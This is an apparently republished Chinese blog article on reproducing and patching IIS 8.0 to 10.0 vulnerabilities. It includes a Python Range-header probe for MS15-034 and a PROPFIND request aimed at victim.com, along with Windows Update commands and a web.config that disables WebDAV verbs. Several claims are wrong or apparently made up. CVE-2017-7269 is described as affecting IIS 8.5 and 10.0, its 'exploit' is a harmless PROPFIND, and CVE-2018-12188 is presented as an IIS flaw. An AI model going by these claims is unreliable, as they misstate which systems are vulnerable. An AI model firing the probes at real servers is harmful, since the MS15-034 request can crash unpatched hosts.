当前位置:   article > 正文

网络安全-IIS8.0-10.0漏洞复现和修复_iis10.0漏洞

iis10.0漏洞
1. CVE-2015-1635:HTTP.sys 远程代码执行漏洞
  • 描述:攻击者可以通过发送特制的 HTTP 请求利用 HTTP.sys 漏洞在目标服务器上执行任意代码。
  • 影响版本:IIS 8.0、8.5 和 10.0。
  • 利用方法:发送特制的请求到目标服务器,例如利用 Range 头字段中的特制值。
  • 修复方法:应用安全更新 MS15-034。

利用示例

  1. import requests
  2. headers = {
  3. 'Range': 'bytes=0-18446744073709551615'
  4. }
  5. response = requests.get('http://victim.com', headers=headers)
  6. print(response.status_code)

修复方法

  1. # Windows 更新命令
  2. wuauclt /detectnow /updatenow
2. CVE-2017-7269:WebDAV 远程代码执行漏洞
  • 描述:IIS 的 WebDAV 服务存在漏洞,攻击者可以通过特制请求执行任意代码。
  • 影响版本:IIS 6.0 及以上版本,包括 8.5 和 10.0。
  • 利用方法:发送特制的 WebDAV 请求。
  • 修复方法:应用相关的安全更新。如果不使用 WebDAV,建议禁用它。

利用示例

  1. import requests
  2. payload = "<?xml version=\"1.0\"?><propfind xmlns=\"DAV:\"><prop><propname/></prop></propfind>"
  3. headers = {
  4. 'Content-Length': str(len(payload)),
  5. 'Content-Type': 'text/xml'
  6. }
  7. response = requests.request('PROPFIND', 'http://victim.com', headers=headers, data=payload)
  8. print(response.status_code)

修复方法

  1. # 禁用 WebDAV 方法
  2. <configuration>
  3. <system.webServer>
  4. <security>
  5. <requestFiltering>
  6. <verbs>
  7. <add verb="PROPFIND" allowed="false" />
  8. <add verb="PROPPATCH" allowed="false" />
  9. <add verb="MKCOL" allowed="false" />
  10. <add verb="COPY" allowed="false" />
  11. <add verb="MOVE" allowed="false" />
  12. <add verb="LOCK" allowed="false" />
  13. <add verb="UNLOCK" allowed="false" />
  14. </verbs>
  15. </requestFiltering>
  16. </security>
  17. </system.webServer>
  18. </configuration>
3. CVE-2019-0941:IIS 身份验证绕过漏洞
  • 描述:IIS 10.0 在特定情况下处理身份验证时存在绕过漏洞,攻击者可以利用该漏洞绕过身份验证。
  • 影响版本:IIS 10.0。
  • 利用方法:通过特制的请求利用身份验证处理中的漏洞。
  • 修复方法:应用最新的安全更新。

修复方法

  1. # Windows 更新命令
  2. wuauclt /detectnow /updatenow
4. CVE-2018-12188:IIS 安全功能绕过漏洞
  • 描述:IIS 通过错误处理标头的方式使得攻击者可以绕过某些安全功能。
  • 影响版本:IIS 10.0。
  • 利用方法:发送特制的请求来利用错误处理中的漏洞。
  • 修复方法:应用最新的安全更新。

修复方法

  1. # Windows 更新命令
  2. wuauclt /detectnow /updatenow

综合防御措施

除了针对特定漏洞的修补,以下是一些综合的防御措施:

  1. 保持系统和软件更新:定期检查并安装微软发布的所有安全更新。
  2. 最小化攻击面:禁用不必要的 IIS 功能和模块,例如 WebDAV,如果不使用的话。
  3. 启用防火墙和入侵检测系统(IDS):配置防火墙规则,阻止不必要的端口和服务。使用 IDS 监控和防范潜在的攻击。
  4. 应用安全配置:确保 IIS 的安全配置按照最佳实践进行,例如使用 SSL/TLS 加密通信,设置严格的权限和访问控制。
  5. 日志和监控:启用详细的日志记录,定期审查日志以检测和响应异常活动。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/1003645
推荐阅读
相关标签
  

闽ICP备14008679号